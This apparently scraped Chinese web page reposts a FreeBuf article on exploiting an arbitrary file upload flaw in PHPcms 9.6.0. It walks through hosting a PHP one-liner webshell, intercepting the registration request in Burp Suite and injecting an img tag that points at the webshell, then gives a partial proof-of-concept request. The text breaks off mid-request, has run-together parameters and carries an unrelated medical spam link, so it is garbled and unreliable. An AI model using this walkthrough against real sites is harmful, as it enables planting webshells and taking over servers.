php发展

首页 » 常识 » 诊断 » PHPcms960最新版任意文件上
TUhjnbcbe - 2022/5/17 23:08:00
引起白癜风原因是什么 http://www.bdfyy999.com/bdf/yufangbaojian/ertongzhuanlan/103916.html

*原创作者:三少,本文属FreeBuf原创奖励计划,未经许可禁止转载

对于PHPcms9.6.0最新版漏洞,具体利用步骤如下:

首先我们在本地搭建一个php环境,我这里是appserv(只要可以执行php文件就行)

在根目录下新建一个txt文本文件里面写上php一句话,如上图可以访问

接着我们找到phpcms网站注册模块,随便填一下信息

然后我们用burpsuite抓包

然后发送到repeater

我们在最下面的注册那儿使用img标签插入我们本地第一步搭建的一句话

poc如下:

siteid=1modelid=11username=zf1agac11password=aasgfaeweeas

email=a1ea1f94

qq.
1
查看完整版本: PHPcms960最新版任意文件上